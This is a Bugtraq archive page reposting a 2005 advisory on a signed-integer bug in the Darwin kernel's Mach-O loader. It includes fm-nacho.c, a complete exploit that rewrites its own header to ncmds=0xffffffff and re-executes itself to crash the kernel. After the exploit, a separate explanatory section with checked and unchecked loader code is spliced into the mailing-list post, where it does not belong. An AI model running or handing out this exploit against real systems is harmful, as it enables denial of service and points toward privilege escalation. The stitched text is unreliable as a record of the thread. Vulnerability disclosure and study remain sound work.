Bugtraq mailing list archives
Re: Darwin Kernel Vulnerability
From: neil () darkridge org
Date: Thu, 20 Jan 2005 09:07:24 +0800
On Wed, Jan 19, 2005 at 11:53:15AM -0800, nemo () felinemenace org wrote:
moderator: resending this mail since it appears to have got dropped, if not, please ignore this message.

   _,'|             _.-''``-...___..--';)
  /_ \'.      __..-' ,      ,--...--'''
 <\    .`--'''       `     /'
  `-';'               ;   ; ;
__...--''     ___...--_..'  .;.'  fL
(,__....----'''       (,..--''    felinemenace.org

Program: Darwin Kernel 7.1
Affects: <= Darwin Kernel 7.7.0

Sorry about the rushed advisory. - nemo
Impact: DoS, possible local privilege escalation.
Discovered: 8th January 2005 by nemo -( nemo @ felinemenace.org )-

Writeup and exploits:

1) Background

Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3. Some of the bugs we investigated exist due to lack of input validation in the mach-o loader.

2) Description

In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the most part each field is trusted to be acceptable. In the mach-o loader code (parse_machfile()) ncmds and offset are both declared as signed integers; however, the appropriate structs used to read from the file are unsigned. After a little investigation a DoS was quickly written to set ncmds to -1.

        ncmds = header->ncmds;
        while (ncmds--) {

The attached code will cause a denial of service on MacOSX <= 10.3.7.

3) Notes

During our audit of the Darwin Kernel many bugs stood out; however, we have not had time to follow through on most of them. Something that caught our attention was the misuse of the copyinstr() command. This function will not force a NULL character to be appended to the string copied in; however, it seems in many cases the size passed to the function doesn't take this into account. Unfortunately, as security goes, it's all about who posts first.

http://www.immunitysec.com/downloads/nukido.pdf

4) Vendor status/notes/fixes/statements

Apple have been notified about this bug.
5) Exploit

//---------------------( fm-nacho.c )--------------------------
/*
 * DoS for Darwin Kernel Version < 7.5.0
 * -(nemo () pulltheplug org)-
 * 2005
 *
 * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
 * irc.pulltheplug.org (#social)
 *
 * Usage: compile, then run the resulting binary by its own path. It opens
 * argv[0] (itself), overwrites ncmds in its own mach-o header, and re-executes
 * the modified file so the kernel's loader parses the bad header.
 */
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <unistd.h>     /* sleep(), execv() */

int main(int ac, char **av)
{
    FILE *me;
    unsigned int rpl = 0xffffffff;  /* new ncmds: the loader reads it back as -1 */
    long pos = 0x10;                /* offset of ncmds in the 32-bit mach_header */

    printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
    printf("-( nemo () pulltheplug org )-\n\n");

    printf("[+] Opening file for writing.\n");
    if (!(me = fopen(*av, "r+"))) {
        printf("[-] Error opening exe.\n");
        exit(1);
    }

    printf("[+] Seeking to ncmds.\n");
    if (fseek(me, pos, SEEK_SET) != 0) {
        printf("[-] Error seeking to ncmds.\n");
        exit(1);
    }

    printf("[+] Changing ncmds to 0x%x.\n", rpl);
    if (fwrite(&rpl, 4, 1, me) < 1) {
        printf("[-] Error writing to file.\n");
        exit(1);
    }
    fclose(me);

    printf("[+] Re-executing with modified mach-o header.\n");
    sleep(5);
    if (execv(*av, av) == -1) {
        printf("[-] Error executing %s, please run manually.\n", *av);
        exit(1);
    }
    exit(0); // hrm
}
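To make the signed/unsigned mismatch in the description concrete, here is an added example (not code from the advisory, and not Apple's fix) that walks a constructed 32-bit Mach-O header the way the quoted parse_machfile() loop does, with a signed ncmds, and then repeats the walk with the checks a loader should make. The mach_header and load_command layouts are the standard 32-bit ones (ncmds at offset 0x10, which is where fm-nacho.c writes); build_sample(), patch_ncmds(), scenario(), the WALK_* codes and the hardening rules in walk_checked() are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MH_MAGIC   0xfeedface   /* 32-bit Mach-O in host byte order */
#define LC_SEGMENT 0x1
#define LC_SYMTAB  0x2
#define NCMDS_OFF  0x10         /* the offset fm-nacho.c overwrites */

#define WALK_OOB   (-1)  /* next load_command lies past the end of the buffer */
#define WALK_STUCK (-2)  /* loop did not finish within MAX_ITER */
#define WALK_BAD   (-3)  /* header rejected by the hardened walk */
#define MAX_ITER   100000

struct mach_header {             /* 28 bytes; standard 32-bit layout */
    uint32_t magic;
    int32_t  cputype, cpusubtype;
    uint32_t filetype, ncmds, sizeofcmds, flags;
};
struct load_command { uint32_t cmd, cmdsize; };

/* Constructed sample (this example's own): a header plus an LC_SEGMENT and an
 * LC_SYMTAB command with zeroed bodies and no segment payload. Returns length. */
size_t build_sample(uint8_t *buf, size_t cap)
{
    struct mach_header hdr = { MH_MAGIC, 18, 0, 2, 2, 56 + 24, 0 }; /* PPC, MH_EXECUTE */
    struct load_command seg = { LC_SEGMENT, 56 }, sym = { LC_SYMTAB, 24 };
    size_t need = sizeof hdr + seg.cmdsize + sym.cmdsize;

    if (cap < need) return 0;
    memset(buf, 0, need);
    memcpy(buf, &hdr, sizeof hdr);
    memcpy(buf + sizeof hdr, &seg, sizeof seg);
    memcpy(buf + sizeof hdr + seg.cmdsize, &sym, sizeof sym);
    return need;
}

/* The same edit fm-nacho.c makes to the file on disk. */
void patch_ncmds(uint8_t *buf, uint32_t value)
{
    memcpy(buf + NCMDS_OFF, &value, sizeof value);
}

/* Loop in the shape quoted from parse_machfile(): ncmds is a signed int, so an
 * on-disk 0xffffffff arrives as -1 and "while (ncmds--)" only stops when the
 * walk runs off the end of the commands. Capped so the demo always returns. */
int walk_unchecked(const uint8_t *buf, size_t len)
{
    struct mach_header hdr;
    struct load_command lc;
    int ncmds, offset, walked = 0, iter = 0;

    if (len < sizeof hdr) return WALK_OOB;
    memcpy(&hdr, buf, sizeof hdr);
    ncmds  = hdr.ncmds;              /* uint32_t -> int: 0xffffffff == -1 */
    offset = sizeof hdr;
    while (ncmds--) {
        if (++iter > MAX_ITER) return WALK_STUCK;
        if ((size_t)offset + sizeof lc > len) return WALK_OOB;  /* kernel: OOB read */
        memcpy(&lc, buf + offset, sizeof lc);
        offset += lc.cmdsize;        /* cmdsize is never checked either */
        walked++;
    }
    return walked;
}

/* Hardened walk: ncmds stays unsigned and is bounded by sizeofcmds (every
 * command is at least a load_command), sizeofcmds must fit the buffer, each
 * cmdsize must be aligned and stay inside sizeofcmds, and the two must agree. */
int walk_checked(const uint8_t *buf, size_t len)
{
    struct mach_header hdr;
    struct load_command lc;
    uint32_t i, offset, end;

    if (len < sizeof hdr) return WALK_BAD;
    memcpy(&hdr, buf, sizeof hdr);
    if (hdr.magic != MH_MAGIC) return WALK_BAD;
    if (hdr.sizeofcmds > len - sizeof hdr) return WALK_BAD;
    if (hdr.ncmds > hdr.sizeofcmds / sizeof lc) return WALK_BAD;   /* rejects 0xffffffff */
    offset = sizeof hdr;
    end = offset + hdr.sizeofcmds;
    for (i = 0; i < hdr.ncmds; i++) {
        if (end - offset < sizeof lc) return WALK_BAD;
        memcpy(&lc, buf + offset, sizeof lc);
        if (lc.cmdsize < sizeof lc || lc.cmdsize % 4 || lc.cmdsize > end - offset)
            return WALK_BAD;
        offset += lc.cmdsize;
    }
    return offset == end ? (int)hdr.ncmds : WALK_BAD;
}

/* Build the sample, optionally apply the ncmds patch, and run one walker. */
int scenario(int patched, int hardened)
{
    uint8_t buf[256];
    size_t len = build_sample(buf, sizeof buf);

    if (patched) patch_ncmds(buf, 0xffffffffu);
    return hardened ? walk_checked(buf, len) : walk_unchecked(buf, len);
}

int main(void)
{
    printf("valid   unchecked=%d checked=%d\n", scenario(0, 0), scenario(0, 1));
    printf("patched unchecked=%d checked=%d\n", scenario(1, 0), scenario(1, 1));
    return 0;
}
```

On the valid sample both walks report 2 commands. After the patch the unchecked loop walks past both real commands and tries to read a third load_command beyond the end of the buffer (WALK_OOB); inside the kernel that read lands in whatever follows the header in memory. The hardened walk rejects the patched header before touching any command, because an ncmds of 0xffffffff cannot fit in an 80-byte sizeofcmds.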
Current thread:
- Darwin Kernel Vulnerability nemo (Jan 19)
- Re: Darwin Kernel Vulnerability neil (Jan 20)